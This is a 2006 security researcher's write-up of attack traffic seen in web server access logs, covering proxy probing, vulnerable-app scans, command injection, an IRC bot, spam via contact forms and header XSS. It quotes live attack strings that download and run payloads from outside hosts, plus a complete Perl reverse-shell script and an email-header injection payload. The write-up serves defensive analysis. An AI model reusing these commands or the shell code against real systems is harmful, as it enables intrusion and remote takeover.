Access Log Analytics 2006


Back Home

Last Updated: Thursday, July 13 2006

Michael Ligh ([email protected])


Table of Contents

  1. Romanian Phishing And Filter Twelve
  2. Open Source Web Apps Scans
  3. sirh0t Wanabees: PHP Perl Bot
  4. Mass Forum-registration Scripts
  5. Contact Page Spam Attempts
  6. Example of a Non-Connect Back Shell
  7. User-Agent XSS, Email headers, and Cookies

While several documents in the past have contained access log entries as an indicator of attack or reconnaissance, I've never had one completely dedicated to this purpose. For the most part, this will present entries that occur in 2006, however I'm starting it a bit early to get it out. I'll append new stories as the year goes on. For related compilations, see (Attack Signatures and Internet Traffic Analysis), (Short Security Discussions), or (Assorted Incidentals 2005).


Romanian Phishing And Filter Twelve

In (Anatomy of a Phish II), it was explained that the compromised server's web access logs were able to be obtained. Having not been rotated since December of 2003, there was a lot of background noise that needed to be stripped away before the phishing-related activity could be isolated. When all that was said and done, there remained a few results that aren't related to the phish, but that are interesting nonetheless. As I sat on a plane from Connecticut to Virginia, I cat-ed, grep-ed, egrep-ed, and awk-ed the access log at least 11 times, finally to recover filter12.txt. This will be a short description of the entries that populated filter12.

Here are some attempts to exploit badly configured mod_proxy settings, with the intention of using the remote webserver to proxy IRC traffic. While this is not a new technique, it's the first time I've seen the source IP address use this method to connect back to itself (ie 66.193.174.41 is both the source IP and the target of the CONNECT and POST connection):

66.193.174.41 - - [05/Dec/2003:21:15:22 +0100] "CONNECT 66.193.174.41:6667 HTTP/1.0" 405 326
66.193.174.41 - - [05/Dec/2003:21:15:22 +0100] "POST http://66.193.174.41:6667/ HTTP/1.0" 200 3307

Judging by the HTTP 405 error code on the CONNECT, the first attempt probably failed. However, the POST attempt completed with an HTTP 200 status. While investigating the compromised server, we noticed it was continuously establishing or closing connections to remote servers over port 6667. The strange part was - a process listing showed no signs of an IRC server or client active on the machine. Surely it could have been hiding via rootkit technology, but the more credible answer in this case is that it's the Apache web server process responsible for making these connections.

Next there are a few POST attempts to the index page, which happened to just be a static HTML document. Given the standard seeming reply size (422 bytes), it's hard to tell what, if any, data was contained in the POST payload. However, the HTTP status code (413 - Request Entity Too Large) hints that there *was* data in the payload.

200.32.3.62 - - [07/Dec/2003:19:57:10 +0100] "POST / HTTP/1.1" 413 422
211.147.1.82 - - [09/Mar/2004:04:51:54 +0100] "POST / HTTP/1.1" 413 422
202.96.108.5 - - [21/Dec/2004:02:00:00 +0100] "POST / HTTP/1.1" 413 422

Out of the three unique sources, none of them sent other requests to the server (unless they returned from a different address. This may have been an attempt to see if the server supported POST methods or to find out if it implemented size restrictions for the data being POST-ed. The prior theory is slighly less likely, since you shouldn't need to POST a huge amount of data to just test the POST functionality (a 1-byte payload would work fine) and also because most modern servers *do* support POST by default.

There were 58 requests using the CONNECT method of locating open proxies, paired with the destination of 1.3.3.7 port 1337. Everyone knows the 1337 string so this is quite the conspicuous entry.

200.32.3.17 - - [15/Dec/2004:20:51:04 +0100] "CONNECT 1.3.3.7:1337 HTTP/1.0" 405 320

There also are mulitple attempts to get more information on what the server supports by using the OPTIONS method in conjuction with the asterisk as a URI:

80.145.23.191 - - [09/Dec/2003:10:12:45 +0100] "OPTIONS * HTTP/1.0" 200 -
82.82.105.208 - - [03/Mar/2004:13:33:34 +0100] "OPTIONS * HTTP/1.0" 200 -

According to the RFC 2616 for HTTP 1.1, [1], If the Request-URI is an asterisk ("*"), the OPTIONS request is intended to apply to the server in general rather than to a specific resource. Since a server's communication options typically depend on the resource, the "*" request is only useful as a "ping" or "no-op" type of method; it does nothing beyond allowing the client to test the capabilities of the server. For example, this can be used to test a proxy for HTTP/1.1 compliance (or lack thereof).

There were a few interesting hits using the methods described earlier for checking proxy capabilities, but that specified internal or local addresses as the target:

216.200.169.14 - - [09/Dec/2003:13:49:46 +0100] "CONNECT 127.0.0.1:6667 HTTP/1.0" 405 322
217.70.150.128 - - [31/Jan/2004:22:19:02 +0100] "CONNECT 10.0.100.20:6667 HTTP/1.0" 405 324
217.70.150.128 - - [31/Jan/2004:22:19:02 +0100] "POST http://10.0.100.20:6667/ HTTP/1.0" 200 3481

To further continue the ever lasting quest for open proxies, there are also a number of hits to proxy checker scripts around the globe.

195.146.238.84 - - [11/Mar/2004:07:53:26 +0100] "GET http://dc.tickerbar.net/tld/pxy.m?nc=31671878 HTTP/1.0" 404 299
218.150.163.30 - - [23/Aug/2004:22:56:24 +0200] "GET http://umsky.com/sproxy.php HTTP/1.0" 404 293
83.237.168.23 - - [04/Feb/2005:03:37:21 +0100] "GET http://www.helllabs.com.ua/cgi-bin/textenv.pl?80 HTTP/1.0" 404 311
61.184.107.2 - - [24/May/2005:19:44:12 +0200] "GET http://www.pe4ati.net/cgi-bin/proxyjudge/prxjdg.cgi HTTP/1.1" 404 317
219.139.229.205 - - [04/Jun/2005:12:43:43 +0200] "GET http://202.105.21.103/cgi-bin/proxycheck.pl HTTP/1.0" 404 309
61.33.255.11 - - [05/Jun/2005:20:12:06 +0200] "GET http://www.100money.com/cgi-bin/ip.cgi HTTP/1.1" 404 304

Here is an example extract of the information returned by these scripts:

HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
HTTP_VIA=1.1 fire.mnin.org:3128 (squid/2.5.STABLE5)
HTTP_X_FORWARDED_FOR=unknown
PATH=/bin:/usr/bin:/usr/local/bin
QUERY_STRING=80
REMOTE_ADDR=24.2.153.164
REMOTE_PORT=51639
REQUEST_METHOD=GET

The attackers in this case are checking the proxy functionality of the target server and at the same time, getting a reading of their accuracy from special scripts. This will verify (or thicken) their anonymity, especially when tunneled through more than one proxy.

There was of course a nice variety of double encoding and directory traversal exploit attempts; and plenty of scans for xmlrpc.php, phpbb2, phpmyadmin, and awstats. For more detail on these particular patterns, refer to (Attack Signatures and Internet Traffic Analysis).

One of the more interesting entries is a one which fails to even specify an HTTP method (ie GET, POST, etc). The pattern is consistent with Code Red attempts, however the GET for default.ida is missing. This could be some strange logging error by Apache or simply a custom request written by a poor author. The manual request editor that comes with the Paros Proxy tool won't even continue without an HTTP method - it errors due to a malformed header.

213.60.85.196 - - [04/May/2004:09:06:28 +0200] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX \
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX \
X%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3% \
u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 400 315

The next entry is using the WebDAV PROPFIND HTTP method, [2] to get information on the ADMIN$ share. The %24 in unicode is the dollar ($) sign.

217.136.188.160 - - [04/Apr/2005:13:44:05 +0200] "PROPFIND /admin%24 HTTP/1.1" 405 321

Last but not least, there is an interesting entry which generates PNG captcha images.

219.156.82.187 - - [09/Jun/2005:09:08:32 +0200] "GET http://verify.qq.com/getimage?0.8821770718181844 HTTP/1.1" 404 295

Visiting the getimage file (even without the parameters), writes a 49x20 pixel, 4 character PNG image. Clicking refresh generates a new one with different characters. Captchas definitely have a use, but I can't fathom it's purpose in this proxy request. It's apparently a widely used request, because a Google search turns up countless other proxy logs with the same entry. It's very popular and at the moment, I have no good theories.

Open Source Web Apps Scans

Here are some scans looking for the Comersus BackOffice Lite. Securiteam released an advisory on multiple vulnerabilities, [3], which describe what likely would have come next, had any of these queries been successful:

"GET /cart/backoffice+/comersus_backoffice_menu.asp HTTP/1.1" 
"GET /backoffice+/comersus_backoffice_menu.asp HTTP/1.1" 
"GET /comersus/backoffice+/comersus_backoffice_menu.asp HTTP/1.1" 
"GET /BackOfficeGold/comersus_backoffice_menu.asp HTTP/1.1" 
"GET /Comersus/BackOfficeGold/comersus_backoffice_menu.asp HTTP/1.1" 
"GET /cart/BackOfficeGold/comersus_backoffice_menu.asp HTTP/1.1" 
"GET /shop/BackOfficeGold/comersus_backoffice_menu.asp HTTP/1.1" 
"GET /Comersus/backofficeLite/comersus_backoffice_menu.asp HTTP/1.1" 
"GET /cart/backofficeLite/comersus_backoffice_menu.asp HTTP/1.1" 
"GET /backofficeLite/comersus_backoffice_menu.asp HTTP/1.1" 
"GET /shop/backofficeLite/comersus_backoffice_menu.asp HTTP/1.1" 
"GET /cart/backofficeplus/comersus_backoffice_menu.asp HTTP/1.1" 
"GET /backofficeplus/comersus_backoffice_menu.asp HTTP/1.1" 
"GET /comersus/backofficeplus/comersus_backoffice_menu.asp HTTP/1.1" 
"GET /shop/backoffice+/comersus_backoffice_menu.asp HTTP/1.1" 
"GET /shop/backofficeplus/comersus_backoffice_menu.asp HTTP/1.1" 

This is trying to exploit an Awstats installation. Nothing new here except for the fact that this one is a bit more conspicuous with the filename (a.pl). Usually this is a perl IRC bot, but in most cases it either has a .txt extension or no extension (like the second entry):

"GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20 \
http://www.geocities.com/m111w19/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1"

"GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20 \
perl;wget%20www.tracknr-dhl-usa.com/sess_3539283e27d73cae29fe2b80f9 \
293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;echo%20;echo| HTTP/1.1"

Then there are the requests that just go all out and download a compressed archive (the more bots, the more fun). This one would be exploited a vulnerability in ZeroBoard, [4].

"GET /board/skin/zero_vote/error.php?dir=http://tracknr-dhl-usa.com/fbi.gif?&cmd \
=cd%20/tmp;curl%20-O%20http://tracknr-dhl-usa.com/bot.tgz;tar%20xzvf%20bot.tgz;cd%20bot;./start HTTP/1.1"

Like all other open source web applications, phpmyadmin has more than it's share of vulnerabilities. Here are some locations where you probably do *not* want to store your installation:

"GET /phpmyadmin/main.php HTTP/1.0" 404 298 "-" "-"
"GET /PMA/main.php HTTP/1.0" 404 291 "-" "-"
"GET /mysql/main.php HTTP/1.0" 404 293 "-" "-"
"GET /admin/main.php HTTP/1.0" 404 293 "-" "-"
"GET /db/main.php HTTP/1.0" 404 290 "-" "-"
"GET /dbadmin/main.php HTTP/1.0" 404 295 "-" "-"
"GET /web/phpMyAdmin/main.php HTTP/1.0" 404 302 "-" "-"
"GET /admin/pma/main.php HTTP/1.0" 404 297 "-" "-"
"GET /admin/phpmyadmin/main.php HTTP/1.0" 404 304 "-" "-"
"GET /admin/mysql/main.php HTTP/1.0" 404 299 "-" "-"
"GET /phpmyadmin2/main.php HTTP/1.0" 404 299 "-" "-"
"GET /mysqladmin/main.php HTTP/1.0" 404 298 "-" "-"
"GET /mysql-admin/main.php HTTP/1.0" 404 299 "-" "-"
"GET /main.php HTTP/1.0" 404 287 "-" "-"
"GET /phpMyAdmin-2.5.6/main.php HTTP/1.0" 404 304 "-" "-"
"GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 304 "-" "-"
"GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 404 304 "-" "-"
"GET /phpMyAdmin-2.2.3/main.php HTTP/1.0" 404 304 "-" "-"
"GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 304 "-" "-"
"GET /myadmin/main.php HTTP/1.0" 404 295 "-" "-"
"GET /phpMyAdmin-2.6.0/main.php HTTP/1.0" 404 304 "-" "-"
"GET /phpMyAdmin-2.6.0-pl1/main.php HTTP/1.0" 404 308 "-" "-"
"GET /phpMyAdmin-2.6.3-pl1/main.php HTTP/1.0" 404 308 "-" "-"
"GET /phpMyAdmin-2.6.3/main.php HTTP/1.0" 404 304 "-" "-"
"GET /phpMyAdmin-2.6.3-rc1/main.php HTTP/1.0" 404 308 "-" "-"
"GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.0" 404 308 "-" "-"

Here are several similar hits, looking to exploit weaknesses in phpopenchat and "tell a friend", [5] software, ZeroBoard, and Awstats:

"GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://220.90.217.49/fbi.gif?&cmd \
=cd%20/tmp;curl%20-O%20220.90.217.49/sess_3539283e27d73cae29fe2b8 \
0f9293f33;perl%20sess_3539283e27d73cae29fe2b80f9293f33 HTTP/1.1" 

"GET /tellafriend/inc/tell_a_friend.inc.php?script_root=http://geocities.com/zamelmania/fbi.gif?&cmd \
=cd%20/tmp;curl%20-O%20220.90.217.49/sess_3539283e \
27d73cae29fe2b80f9293f33;perl%20sess_3539283e27d73cae29fe2b80f9293f33 HTTP/1.1" 

"GET /bbs/skin/zero_vote/error.php?sourcedir=http://220.90.217.49/fbi.gif?&cmd=cd%20/tmp;curl%20-O \
%20220.90.217.49/sess_3539283e27d73cae29fe2b80f9293f3;perl%20sess_3539283e27d73cae29fe2b80f9293f33 HTTP/1.1"

"GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20 \
220.90.217.49/sess_3539283e27d73cae29fe2b80f9293f33;perl \
%20sess_3539283e27d73cae29fe2b80f9293f33;echo%20;echo| HTTP/1.1" 

Here is an attempt to exploit WebCalendar, which, of course, has tons of vulnerabilities (isn't this fun?). This attempt is interesting because it combines wget, curl, and fetch all into one hit, wheras normally you'll see them split into three seperate queries.

"GET /WebCalendar/tools/send_reminders.php?includedir=http://82.165.228.69/images/fbi.gif?&cmd= \
cd%20/tmp;wget%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;curl%20-O%20
http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;fetch%20http://82.165.32.233/ \
images/sess_3539283e27d73cae29fe2b80f9293f60;perl%20sess_3539 \
283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* HTTP/1.1" 

Here are some traces of lupii/lupper, [6] which is known to attack xmlrpc.php regularly. This gives it the upper hand in attacks against web applications such as PostNuke, Drupal, b2evolution, Xoops, WordPress, PHPGroupWare and TikiWiki:

"GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e \
193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo|  HTTP/1.1"

"GET /scgi/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii; \
chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1"

"GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2f \
listen%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1"

This is a targeted attack against unpatched Mambo installations, [7]. In another story, we'll present an instance where this exploit was successful in getting an IRC bot onto a server that we have access to:

"GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS= \
&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback; \
chmod%20744%20cback;./cback%20194.112.220.37%208080;echo%20YYY;echo|  HTTP/1.1"

sirth0t Wanabees: PHPBB Perl Bot

An article in (2005 Incidentals) discussed a scripter by the name of sirh0t, who likes to spend time defacing web sites with previously published exploits. Just when you thought people couldn't get any dumber, surprises like this pop up. Apparently sirh0t has his own wanabe crew. These people copy the copy cats. The following entries were found in web access logs:

[04/Dec/2005:17:30:59 +0000] "GET /forums/viewtopic.php?t=86&highlight= \
%2527.$poster=include($_GET[m]).%2527&m=http://smellthecoffee.com/images/phpbb_private?& HTTP/1.0" \
 200 110821 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t and Aleks)"

[04/Dec/2005:17:38:25 +0000] "GET /forums/viewtopic.php?t=86&highlight=%2527. \
$poster=include($_GET[m]).%2527&m=http://billing.veloxinternet.com/inc/phpbb_private?& HTTP/1.0" 200 \
110821 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t and Aleks)"

[10/Dec/2005:08:43:42 -0500] "GET /forums/viewtopic.php?t=63&highlight=%2527.$poster=include \
($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 35515 "http://www.google.nl/" \
"Mozilla/4.0 (modded by sirh0t fuck Aleks)"

[10/Dec/2005:08:44:42 -0500] "GET /forums/viewtopic.php?t=63&highlight=%2527.$poster=include \
($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 35515 "http://www.google.nl/" \
"Mozilla/4.0 (modded by sirh0t fuck Aleks)"

The phpbb_private.txt file defaces index.php (if it exists) with the following message:

DEFACED BY UNLOCK
FUCK YOU 0X1FE AND ALL YOU PEOPLE IN UR CHANNEL ;-) FUCK BOTS, FUCK BOXTALK HOPE ALL U LAMERS GET BUSTED
I OWN YOU ALL!!!
Credits to sirh0t and phpbb

A perl IRC bot code follows this function and connects to 66.55.70.74:5555 by default. It logs in with a nickname defined by the output of whoami and joins channel #defaced. The script masquerades as being mIRC version 6.16. In addition, it enables the following functionality:

A comment in the script exclaims "GOOGLE BLOCKED MOSTLY STRINGS SO I MADE IT DYNAMIC." What this really means is that random integers are chosen for inclusion in the search criteria (\$str\.\$rnd), the total number of results to return (&num=$n), and the offset where to start showing results (&start=$s). Google could still block according to the primary keywords in the request. Here is the query-building function:

sub fetch2(){
    my \$rnd=(int(rand(9999)));
    my \$n= 50;
    my \$str=\$_[0];
    if (\$rnd<5000) { \$n<<=1;}
    my \$s= (int(rand(10)) * \$n);
    my \$query=\"www.google.com.ar/search?q=\";
    \$query.=\$str.\$rnd;
    \$query.=\"&num=\$n&hl=nl&start=\$s&sa=N\";
    ...
}

The perl bot is written to /tmp/fuck_0X1FE and then three methods of executing it are attempted, including passthrough(), shell_exec(), and system(). The Internet Storm Center published some information on this bot in their (November 10 Diary).

Mass Forum-registration Scripts

The "mass" part of this section is only an assumption. From the following log entries, it looks like someone wrote a script using Perl's libwww module that focuses on registering the user on PHPBB forums. This could be in preparation for a post with XSS content or other malicious code that would harm other users who view the posting. Since many forums require registration before posts are accepted, this script would help the attacker obtain authorization on a number of forums without having to go through the process manually.

The first hit in the series is just a GET to /forums/profile.php. This is the page within PHPBB installations where new users enter registration information. You can see there was an HTTP 200 status returned, which means success, however that is only partly true. There is no /forums/profile.php file on my site (there was about 2 years ago), so the attacker didn't actually hit what he intended to hit (he just got a catch-all index page):

69.54.37.20 - - [02/Mar/2006:10:03:40 -0500] "GET /forums/profile.php?mode=register&agreed=true HTTP/1.1" 200 16570

After getting that HTTP 200, the attacker's script assumed that it had located a valid PHPBB install, and moved forward with attempting to register a new user:

69.54.37.20 - - [02/Mar/2006:10:03:41 -0500] "POST /forums/profile.php HTTP/1.1" 200 16570

I had mod_security logging POST payloads, so it was able to capture the data that this script tried to use for the account. Here are some of the interesting fields:

POST /forums/profile.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Accept: text/xml,application/xml,application/xhtml+xml,text/html, text/xml,application/xml,application/xhtml+xml,text/html
Accept-Language: en-us,en;q=0.5, en-us,en;q=0.5
Host: www.mnin.org
Referer: http://www.mnin.org/forums/profile.php?mode=register&agreed=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Content-Length: 2150
Content-Type: multipart/form-data; boundary=xYzZY

Content-Disposition: form-data; name="username"

excitingravinder
--xYzZY
Content-Disposition: form-data; name="email"

[email protected]
--xYzZY
Content-Disposition: form-data; name="new_password"

excitingdong
--xYzZY
Content-Disposition: form-data; name="website"

http://www.credobase.com/
--xYzZY

Its comforting to know that excitingravinder from credobase.com didn't actually obtain an account on anything. The final web request from the source address checked to see if the registration completed. It simply called the memberlist.php page with descending order. This failed too, because unlike the GET and POST to member.php, the user didn't forge the User Agent of this last request...and I'm not sure but mod_security might reject requests from libwww-perl ;->

69.54.37.20 - - [02/Mar/2006:10:03:42 -0500] "GET /forums/memberlist.php?order=DESC&mode=joined HTTP/1.1" 500 1041 "-" "libwww-perl/5.803"

Peace out excitingravinder, better luck with future endeavors.

Contact Page Spam Attempts

These are clear attempts to send spam through the contact.php page on my site. Its a good approach if sending spam via normal methods fail, because poorly written contage pages are just as abundant as poorly configured MTAs. Furthermore, if an MTA was actually configured securely to only accept relay requests from trusted networks (one of which is localhost), contact page spam still might have a chance of success (because it will essentially originate from localhost).

So, imagine you are a spammer and want to try sending email through my contact form. What would you send? If you need some examples, a few are included in this section. As the POST payload, one spammer submitted the following data:

email=to%0D%0AContent-Type%3A+multipart%2Fmixed%3B+boundary%3D3f4c8cd67a53dda21a711afec0611ee1%0A
MIME-Version%3A+1.0%0ASubject%3A+a+poet.+ost+thou+call+it+good+fortune%2C+answered%0Abcc%3A+charieses329%40
aol.com%0A%0AThis+is+a+multi-part+message+in+MIME+format.%0A%0A--3f4c8cd67a53dda21a711afec0611ee1%0AConten
t-Type%3A+text%2Fplain%3B+charset%3D%22us-ascii%22%0AMIME-Version%3A+1.0%0AContent-Transfer-Encoding%3A+
7bit%0A%0Ashoe+soles+drop+anish+opular+ong.+n+the+following%0A--3f4c8cd67a53dda21a711afec0611ee1--
%0A%0D%0A.%0D%0A

Let me decode that for you:

email=to
Content-Type: multipart/mixed;boundary=3f4c8cd67a53dda21a711afec0611ee1
MIME-Version: 1.0
Subject: a poet ost thou call it good fortune, answered 
bcc: [email protected]
This is a multi-part message in MIME format.
--3f4c8cd67a53dda21a711afec0611ee1
Content-Type: text/plain;charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: +7bit
shoe soles drop anish opular ong n the following
--3f4c8cd67a53dda21a711afec0611ee1

The spammer here is hoping that the contact form will inject the message as-is directly into the mail server's delivery queue. By "as-is" I mean without filtering the "bcc" field or other email headers. Note the "email=" part, which is the name of my text field where users should input their return email address. The spammer must have viewed the source of my page in order to learn that. However, he would quickly find that in order to submit a message, the other fields cannot be blank. Therefore, he would try again with slightly altered input:

text=the1180%40spree.mnin.org&email=the1180%40spree.mnin.org&Submit=in[...]

In this attempt, the attacker fills the "text" field and resubmits. When this also failed, he would alter a few of the parameters and try again:

text=those6525%40spree.mnin.org&name=those6525%40spree.mnin.org&Submit=those6525%40spree.mnin.org&email=soldiers[...]

I'm not sure why he would assign an email address to the "Submit" field and use the word "soldiers" as the return email address. The spammer attempted one last combination before packing up and hitting the road (to bigger and better things I'm sure).

text=stood8261%40spree.mnin.org&email=stood8261%40spree.mnin.org&Submit=stood8261%40spree.mnin.org&name=him[...]

In any case, the spammer who calls himself "him" clearly did not read the PHP email injection article.

Example of a Non-Connect Back Shell

This is an incident where we get to see a true script kiddie in action. The attacker is trying to exploit a machine, however he can't figure out the proper syntax for a simple Linux command. These people are hilarious.

A common connect-back shell was the payload of this attempt. In particular, here is a sample of the perl code from http://81.58.26.26/libsh/ping.txt (probably will be removed by the time this article is read).

#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i");

There is also an ELF version at http://81.58.26.26/libsh/ping that accepts the same parameters (connect back IP and port).

My favorite part is the URL constructed to make a server fetch and execute this code. These were extracted from web access logs of the targeted system.

# first try
wget http://81.58.26.26/libsh/ping.txt;mv ping.txt temp2006;perl temp2006 194.29.226.37 3303

# second try
wget http://81.58.26.26/libsh/ping;chmod  x ping;./ping 194.29.226.37 3303

# third try
curl -o ping http://81.58.26.26/libsh/ping;chmod  x ping;./ping 194.29.226.37 3303

The first try failed because ping.txt (renamed to temp2006) wasn't executable. The attacker realized this and tried to make it executable in the next try, except part of the chmod command was left out. S/he must have then thought it all failed thus far due to an error with wget, so s/he tried curl instead...but that failed too because wget wasn't the problem.

The web server's error log follows.

--00:10:06--  http://81.58.26.26/libsh/ping.txt
           => `ping.txt'
Connecting to 81.58.26.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 358 [text/plain]
ping.txt: Permission denied

Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory
--00:10:07--  http://81.58.26.26/libsh/ping
           => `ping'
Connecting to 81.58.26.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,808 (15K) [text/plain]
ping: Permission denied

Cannot write to `ping' (Permission denied).
chmod: invalid mode string: `x'
sh: line 1: ./ping: No such file or directory
  % Total    % Received % Xferd  Average Speed          Time   Curr.
                                 Dload  Upload Total    Current  Left   Speed
  7 15808    7  1169    0     0   1031      0  0:00:15  0:00:01 0:00:14  1031
curl: (23) Failed writing body
chmod: invalid mode string: `x'
sh: line 1: ./ping: No such file or directory
  % Total    % Received % Xferd  Average Speed          Time   Curr.
                                 Dload  Upload Total    Current  Left   Speed
100   358  100   358    0     0    437      0  0:00:00  0:00:00  0:00:00     0

Perhaps next time around the attacker(s) will spend a few moments looking up how to issue commands before actually trying to execute them. Its humorous to note that the people trying to break into systems don't even necessarily know what to do if they get in.

User-Agent XSS, Email Headers, and Cookies

Its been a while since I looked through web logs. The first record shows someone attempting to exploit XSS by sending the code in the User-Agent HTTP header and USER_AGENT PHP variable. Tags have been converted to square brackets for presentation.

06/25-16:40:16.261303 84.98.90.246:4173 -> 10.x.x.x:80
TCP TTL:51 TOS:0x0 ID:26872 IpLen:20 DgmLen:879 DF
***AP*** Seq: 0x8FC4DBF  Ack: 0x2FA3F70C  Win: 0x8700  TcpLen: 20
GET /write/2006_phish_2.pdf HTTP/1.1
Host: mnin.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5, 
[!--; ' ' " " '' ""// -- ## */ /*(* ( #[ #! ') + [script] # 
Accept-Language: en-us,en;q=0.5
Accept-Encoding:gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:http://www.google.fr/search?q=
REMOTE_ADDR: 64.233.187.100
REMOTE_ADDRESS: 64.233.187.100
REMOTE_HOST: google.com
USER_AGENT: [!--  ; ' ' "" '' ""  // -- ## */ /* (* ( #[#! ') + --] [script]alert(1)[/script]  # 
VIA:64.233.187.100
CLIENT_IP: 64.233.187.99
X_FORWARDED_FOR: 64.233.187.99
Pragma: no-cache
Cache-Control: no-cache....

This next one is strange, because it contains the From: header for an email. This isn't strange per se if the request is attempt to spam through the server, however no other headers indicate spam attempts and the message body is empty.

Request: mnin.org 64.124.14.124 - - [24/Jun/2006:19:54:17 --0400] 
"GET /data/incidentals/rbot_dumped_strings HTTP/1.1" 500 1037 "-" 
"Mozilla/5.0 (compatible; Konqueror/3.1; Linux; en)" - "-"
Handler: type-map
----------------------------------------
GET /data/incidentals/rbot_dumped_strings HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
From: [email protected]
Host: mnin.org
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; Linux; en)
Content-Length: 0
Content-Type: application/x-www-form-urlencoded

This next log shows someone using the Snoopy v.1.2.3 tool to inject just about every cookie it can think of. I suppose its just trying to trick the server into doing something that it shouldn't. In total, there are cookies for about 200 different products sent to the server in this request. Please see the external data file for the sample.


References

[1]. http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html#sec9.2
[2]. http://msdn2.microsoft.com/en-us/library/aa125901.aspx
[3]. http://www.securiteam.com/windowsntfocus/5TP0Q0UEKI.html
[4]. http://xforce.iss.net/xforce/xfdb/18893
[5]. http://www.securitytracker.com/alerts/2005/Mar/1013390.html
[6]. http://isc.sans.org/diary.html?storyid=823
[7]. http://www.frsirt.com/exploits/20051122.mambo452_xpl.php.php
[8]. http://isc.sans.org/diary.html?storyid=834